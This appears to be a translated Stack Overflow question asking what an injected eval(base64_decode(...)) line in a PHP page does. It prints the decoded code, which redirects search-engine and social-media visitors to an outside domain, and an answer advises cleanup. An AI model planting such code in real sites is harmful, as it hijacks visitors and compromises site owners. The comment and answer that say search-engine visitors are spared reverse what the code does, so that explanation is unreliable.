【问题标题】:eval(base64_decode hack [closed]eval(base64_decode hack [关闭]
【发布时间】:2011-07-10 13:12:09
【问题描述】:

我正在使用的后端页面似乎已经注入了这些行 - eval(base64_decode("CgplcnJvcl9yZXBvcnRpbmcoMCk7C ...

base64 字符串解码为

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
  $referer=$_SERVER['HTTP_REFERER'];

  if (stristr($referer,"aol.com")
    or stristr($referer,"yahoo")
    or stristr($referer,"google")
    or stristr($referer,"bing")
    or stristr($referer,"ask.com")
    or stristr($referer,"msn")
    or stristr($referer,"live")
    or stristr($referer,"facebook")
  ) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")) {
        header("Location: http://lovemypants.co.cc/");
        exit();
    }
  }
}

很抱歉没有把问题说清楚。在写这个问题的时候,我对编程和 SO 都是一个菜鸟,我想知道这段代码是什么意思以及它的影响是什么。

【问题讨论】:

  • 抱歉,我没听懂。
  • 您的访问者将被重定向到 lovemypants.co.cc,除非他们来自某个搜索引擎。但我在这里没有看到真正的问题?
  • ..别提了。没有备份??

标签: php base64 eval


【解决方案1】:

如果您正在寻找风险分析,那么我可以告诉您,“黑客”只是将访问者重定向到 lovemypants.co.cc(如果他们是实际访问),而不是从搜索引擎重定向。

删除黑客、更改密码、设置公钥身份验证、让知道自己在做什么的人保护您的服务器,并设置定期备份 ... 现在

(下次请实际上写一个问题。)

【讨论】:

    猜你喜欢
    • 1970-01-01
    • 1970-01-01
    • 1970-01-01
    • 2014-01-08
    • 1970-01-01
    • 2014-09-28
    • 2013-07-07
    • 2011-03-03
    • 2012-07-16
    相关资源
    最近更新 更多